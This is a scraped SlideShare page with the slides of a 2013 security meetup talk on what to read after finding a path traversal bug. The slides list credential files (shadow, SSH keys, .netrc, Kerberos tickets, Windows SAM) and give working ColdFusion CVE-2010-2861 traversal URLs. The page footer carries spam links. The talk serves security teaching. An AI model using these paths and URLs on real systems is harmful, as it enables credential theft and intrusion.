SlideShare a Scribd company logo

4.1. Path traversal post_exploitation

defconmoscow
defconmoscow

Meeting #4.

Internet
1 of 22
Download to read offline
Path traversal post exploitation By George Lagoda Nov 23, 2013
This slide intentionally left blank (always dreamed of it )
Common understanding of path traversal A Path Traversal attack aims to access files and directories that are stored outside the web root folder. (OWASP) WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
/etc/passwd – why so special?
Y.O.B.A. hacking NEXT STEPS 1. /root/.bash_history if not accessible try harder: /home/username/.bash_history game me:
Looks like epic win??: After analyzing prepare_release.sh:
.netrc file • Provides remember me for ftp What I had when checked /home/username/.netrc : machine ftp.server.com login secret_usr password secret_pwd
Help for shell uploading /proc/self/environ /proc/self/status Useful if we wanna find access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
Smtg fo crds • SSH keys, often passwordless: /home/*/.ssh/id* • Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab • PGP keys: /home/*/.gnupg/secring.gpgs
What distro we have? • /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat • /etc/fedora-release # Fedora • /etc/slackware-release, • /etc/slackware-version # Slackware • /etc/debian_release, /etc/debian_version # Debian • /etc/mandrake-release # Mandrake • /etc/sun-release # Sun JDS • /etc/release # Solaris/Sparc • /etc/gentoo-release # Gentoo • /etc/arch-release # Arch Linux (file will be empty) • arch # OpenBSD; sample: “OpenBSD.amd64”
What about windows?
File Expected Contents / Description %SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. %WINDIR%win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. %SYSTEMROOT%repairSAM %SYSTEMROOT%System32configR egBackSAM It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in repair is locked, but can be retired using forensic or Volume Shadow copy methods %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configR egBacksystem %SYSTEMDRIVE%autoexec.bat
%SYSTEMDRIVE%pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size %WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log %SystemDrive%inetpublogsLogFiles IIS 7’s logs location %WINDIR%system32logfilesw3svc1exY YMMDD.log (year month day) %WINDIR%system32configAppEvent.Evt %WINDIR%system32configSecEvent.Evt %WINDIR%system32configdefault.sav %WINDIR%system32configsecurity.sav %WINDIR%system32configsoftware.sav %WINDIR%system32configsystem.sav %WINDIR%system32CCMlogs*.log %USERPROFILE%ntuser.dat
U really thought I will forget bout kittens?
• /etc/passwd • /etc/shadow (gotta try..) • /etc/shadow~ # (sometimes there when edited with gedit) • /etc/master.passwd • /etc/group • /etc/hosts • /etc/crontab • /etc/sysctl.conf • /etc/resolv.conf • /etc/samba/smb.conf • /etc/exports • /etc/auto.master • /etc/auto_maste • /etc/fstab • /etc/exports • /etc/sudoers
Some SW defaults http://wiki.apache.org/httpd/DistrosDefaultLay out
Also for cold fusion(not the last vers but still) ColdFusion 6: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword. properties%00en ColdFusion 7: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor d.properties%00en ColdFusion 8 http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor d.properties%00en All versions: http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en http://www.cvedetails.com/cve/CVE-2010-2861/
• In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
Why so serious?
Thank you for visiting us And HACK YOU  (the end).

Recommended

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
Prashant Hegde
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
n|u - The Open Security Community
 
OOP Language Powerpoint
OOP Language PowerpointOOP Language Powerpoint
OOP Language Powerpoint
Angelia Nicole Dela Cruz
 
Computer Forensics & Windows Registry
Computer Forensics & Windows RegistryComputer Forensics & Windows Registry
Computer Forensics & Windows Registry
somutripathi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat Sheet
Juan F. Padilla
 
Windows Registry Analysis
Windows Registry AnalysisWindows Registry Analysis
Windows Registry Analysis
Himanshu0734
 
Registry Forensics
Registry ForensicsRegistry Forensics
Registry Forensics
Somesh Sawhney
 
Namespaces and Autoloading
Namespaces and AutoloadingNamespaces and Autoloading
Namespaces and Autoloading
Vic Metcalfe
 

Recommended

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
Prashant Hegde
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
n|u - The Open Security Community
 
OOP Language Powerpoint
OOP Language PowerpointOOP Language Powerpoint
OOP Language Powerpoint
Angelia Nicole Dela Cruz
 
Computer Forensics & Windows Registry
Computer Forensics & Windows RegistryComputer Forensics & Windows Registry
Computer Forensics & Windows Registry
somutripathi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat Sheet
Juan F. Padilla
 
Windows Registry Analysis
Windows Registry AnalysisWindows Registry Analysis
Windows Registry Analysis
Himanshu0734
 
Registry Forensics
Registry ForensicsRegistry Forensics
Registry Forensics
Somesh Sawhney
 
Namespaces and Autoloading
Namespaces and AutoloadingNamespaces and Autoloading
Namespaces and Autoloading
Vic Metcalfe
 
Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility Framework
Kapil Soni
 
Unit 7
Unit 7Unit 7
Unit 7
siddr
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2
Acácio Oliveira
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchy
sritolia
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
OWASP (Open Web Application Security Project)
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0
Bandit S
 
File management in C++
File management in C++File management in C++
File management in C++
apoorvaverma33
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
laonap166
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security
Tarikul Islam
 
File_Management_in_C
File_Management_in_CFile_Management_in_C
File_Management_in_C
NabeelaNousheen
 
File Management in C
File Management in CFile Management in C
File Management in C
Munazza-Mah-Jabeen
 
Fluentd introduction at ipros
Fluentd introduction at iprosFluentd introduction at ipros
Fluentd introduction at ipros
Treasure Data, Inc.
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchy
sritolia
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
Jameel Nabbo
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
Phil Hagen
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchy
Dr. C.V. Suresh Babu
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
Nabil Munawar
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disks
iammutex
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2
tech2click
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dump
Thierry Gayet
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Puppet
 

More Related Content

What's hot

Unit 7
Unit 7Unit 7
Unit 7
siddr
 

What's hot (14)

Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility Framework
 
Unit 7
Unit 7Unit 7
Unit 7
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchy
 
Flashack
FlashackFlashack
Flashack
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0
 
File management in C++
File management in C++File management in C++
File management in C++
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security
 
File_Management_in_C
File_Management_in_CFile_Management_in_C
File_Management_in_C
 
File Management in C
File Management in CFile Management in C
File Management in C
 
Fluentd introduction at ipros
Fluentd introduction at iprosFluentd introduction at ipros
Fluentd introduction at ipros
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchy
 

Similar to 4.1. Path traversal post_exploitation

SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
Phil Hagen
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
Craig Cannon
 
Lamp1
Lamp1Lamp1
Lamp1
Reka
 
Lamp
LampLamp
Lamp
Reka
 
CASPUR Staging System II
CASPUR Staging System IICASPUR Staging System II
CASPUR Staging System II
Andrea PETRUCCI
 

Similar to 4.1. Path traversal post_exploitation (20)

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchy
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disks
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dump
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
 
Linux Common Command
Linux Common CommandLinux Common Command
Linux Common Command
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensics
 
Mem forensic
Mem forensicMem forensic
Mem forensic
 
Using filesystem capabilities with rsync
Using filesystem capabilities with rsyncUsing filesystem capabilities with rsync
Using filesystem capabilities with rsync
 
Edubooktraining
EdubooktrainingEdubooktraining
Edubooktraining
 
Root file system for embedded systems
Root file system for embedded systemsRoot file system for embedded systems
Root file system for embedded systems
 
Solaris_quickref.pdf
Solaris_quickref.pdfSolaris_quickref.pdf
Solaris_quickref.pdf
 
Lamp1
Lamp1Lamp1
Lamp1
 
Lamp1
Lamp1Lamp1
Lamp1
 
Lamp
LampLamp
Lamp
 
CASPUR Staging System II
CASPUR Staging System IICASPUR Staging System II
CASPUR Staging System II
 

More from defconmoscow

6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail
defconmoscow
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection
defconmoscow
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware
defconmoscow
 

More from defconmoscow (20)

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRL
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenment
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF final
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communications
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensics
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddler
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypot
 
3.2. White hat
3.2. White hat3.2. White hat
3.2. White hat
 

Recently uploaded

原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样
原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样
原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样
gfhdsfr
 
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
musaddumba454
 
一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理
一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理
一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理
Fir
 
一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样
一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样
一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样
Fi
 
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
Fir
 
原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样
原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样
原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样
rgdasda
 
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkkaudience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
lolsDocherty
 
一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理
一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理
一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理
C
 
原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样
A
 
一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理
A
 
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
Fir
 

Recently uploaded (20)

AI Generated 3D Models | AI 3D Model Generator
AI Generated 3D Models | AI 3D Model GeneratorAI Generated 3D Models | AI 3D Model Generator
AI Generated 3D Models | AI 3D Model Generator
 
原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样
原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样
原版定制(爱大毕业证书)英国爱丁堡大学毕业证原件一模一样
 
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
 
一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理
一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理
一比一原版(NYU毕业证书)美国纽约大学毕业证如何办理
 
Development Lifecycle.pptx for the secure development of apps
Development Lifecycle.pptx for the secure development of appsDevelopment Lifecycle.pptx for the secure development of apps
Development Lifecycle.pptx for the secure development of apps
 
Free on Wednesdays T Shirts Free on Wednesdays Sweatshirts
Free on Wednesdays T Shirts Free on Wednesdays SweatshirtsFree on Wednesdays T Shirts Free on Wednesdays Sweatshirts
Free on Wednesdays T Shirts Free on Wednesdays Sweatshirts
 
Free scottie t shirts Free scottie t shirts
Free scottie t shirts Free scottie t shirtsFree scottie t shirts Free scottie t shirts
Free scottie t shirts Free scottie t shirts
 
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
 
一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样
一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样
一比一原版(Soton毕业证书)南安普顿大学毕业证原件一模一样
 
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
 
Premier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdfPremier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdf
 
🍑👄Dehradun Esℂorts Serviℂe☎️9315791090🍑👄 ℂall Girl serviℂe in ☎️Dehradun ℂall...
🍑👄Dehradun Esℂorts Serviℂe☎️9315791090🍑👄 ℂall Girl serviℂe in ☎️Dehradun ℂall...🍑👄Dehradun Esℂorts Serviℂe☎️9315791090🍑👄 ℂall Girl serviℂe in ☎️Dehradun ℂall...
🍑👄Dehradun Esℂorts Serviℂe☎️9315791090🍑👄 ℂall Girl serviℂe in ☎️Dehradun ℂall...
 
Statistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdfStatistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdf
 
原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样
原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样
原版定制(PSU毕业证书)美国宾州州立大学毕业证原件一模一样
 
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkkaudience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
audience research (emma) 1.pptxkkkkkkkkkkkkkkkkk
 
一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理
一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理
一比一原版(Princeton毕业证书)普林斯顿大学毕业证如何办理
 
原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样
 
一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理
 
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
 
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
 

4.1. Path traversal post_exploitation

  • 1. Path traversal post exploitation By George Lagoda Nov 23, 2013
  • 2. This slide intentionally left blank (always dreamed of it )
  • 3.
  • 4. Common understanding of path traversal A Path Traversal attack aims to access files and directories that are stored outside the web root folder. (OWASP) WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
  • 5. /etc/passwd – why so special?
  • 6. Y.O.B.A. hacking NEXT STEPS 1. /root/.bash_history if not accessible try harder: /home/username/.bash_history game me:
  • 7. Looks like epic win??: After analyzing prepare_release.sh:
  • 8.
  • 9. .netrc file • Provides remember me for ftp What I had when checked /home/username/.netrc : machine ftp.server.com login secret_usr password secret_pwd
  • 10. Help for shell uploading /proc/self/environ /proc/self/status Useful if we wanna find access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
  • 11. Smtg fo crds • SSH keys, often passwordless: /home/*/.ssh/id* • Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab • PGP keys: /home/*/.gnupg/secring.gpgs
  • 12. What distro we have? • /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat • /etc/fedora-release # Fedora • /etc/slackware-release, • /etc/slackware-version # Slackware • /etc/debian_release, /etc/debian_version # Debian • /etc/mandrake-release # Mandrake • /etc/sun-release # Sun JDS • /etc/release # Solaris/Sparc • /etc/gentoo-release # Gentoo • /etc/arch-release # Arch Linux (file will be empty) • arch # OpenBSD; sample: “OpenBSD.amd64”
  • 14. File Expected Contents / Description %SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. %WINDIR%win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. %SYSTEMROOT%repairSAM %SYSTEMROOT%System32configR egBackSAM It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in repair is locked, but can be retired using forensic or Volume Shadow copy methods %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configR egBacksystem %SYSTEMDRIVE%autoexec.bat
  • 15. %SYSTEMDRIVE%pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size %WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log %SystemDrive%inetpublogsLogFiles IIS 7’s logs location %WINDIR%system32logfilesw3svc1exY YMMDD.log (year month day) %WINDIR%system32configAppEvent.Evt %WINDIR%system32configSecEvent.Evt %WINDIR%system32configdefault.sav %WINDIR%system32configsecurity.sav %WINDIR%system32configsoftware.sav %WINDIR%system32configsystem.sav %WINDIR%system32CCMlogs*.log %USERPROFILE%ntuser.dat
  • 16. U really thought I will forget bout kittens?
  • 17. • /etc/passwd • /etc/shadow (gotta try..) • /etc/shadow~ # (sometimes there when edited with gedit) • /etc/master.passwd • /etc/group • /etc/hosts • /etc/crontab • /etc/sysctl.conf • /etc/resolv.conf • /etc/samba/smb.conf • /etc/exports • /etc/auto.master • /etc/auto_maste • /etc/fstab • /etc/exports • /etc/sudoers
  • 19. Also for cold fusion(not the last vers but still) ColdFusion 6: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword. properties%00en ColdFusion 7: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor d.properties%00en ColdFusion 8 http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor d.properties%00en All versions: http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en http://www.cvedetails.com/cve/CVE-2010-2861/
  • 20. • In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
  • 22. Thank you for visiting us And HACK YOU  (the end).